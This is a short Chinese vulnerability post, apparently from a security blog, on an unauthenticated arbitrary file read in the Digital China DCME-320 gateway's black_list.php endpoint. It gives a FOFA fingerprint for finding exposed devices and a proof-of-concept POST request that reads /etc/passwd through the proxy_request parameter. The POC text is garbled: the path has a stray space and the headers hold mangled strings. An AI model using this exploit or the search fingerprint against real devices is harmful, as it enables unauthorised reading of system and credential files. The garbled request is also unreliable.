共计 402 个字符,预计需要花费 2 分钟才能阅读完成。
漏洞描述
神州数码 DCME-320出口网关 black_list.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
搜索引擎
FOFA:
body="style/blue/css/dcn_ui.css"漏洞复现
POC
POST /function/auth/user/black list.php HTTP/1.1
Host:
User-Agent: Mozil1a/5.0-(Windows 'NT.10.0; .Win64;*x64)ApplelebKit/537.36.(KHTML, like Gecko)-chrome/99.0.4844.84 afari/537.36
Content-Type:"application/x-www-form-urlencoded
proxy_request=/etc/passwd正文完
